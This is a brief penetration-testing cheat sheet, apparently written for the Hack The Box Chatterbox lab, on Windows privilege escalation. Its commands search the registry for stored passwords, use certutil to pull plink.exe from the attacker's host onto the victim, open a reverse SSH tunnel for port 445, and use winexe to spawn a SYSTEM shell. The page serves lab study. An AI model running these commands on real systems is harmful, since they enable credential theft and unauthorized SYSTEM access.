Passwords and Port Forwarding
plink.exe
Enumeration
Hunt for passwords in registry:
reg query HKLM /f password /t REG_SZ /s
Look for internal open ports:
netstat -ano
If we find a credential and internal open ports
Exploitation
On your attack machine, edit /etc/ssh/sshd_config
:

Restart SSH service:
service ssh restart
Download plink.exe
to your attack machine:
Transfer plink.exe
to the victim machine:
certutil -urlcache -f http://<local_ip>/plink.exe plink.exe
On the victim machine, do port forwarding (suppose we want to forward port 445):
plink.exe -l root -pw <your_kali_password> -R 445:127.0.0.1:445 <local_ip>
Press "Enter" a few times to get the output. Use winexe
to spawn a SYSTEM shell:
winexe -U Administrator%<password> //127.0.0.1 "cmd.exe"
Lab: Hack The Box - Chatterbox
Last updated
Was this helpful?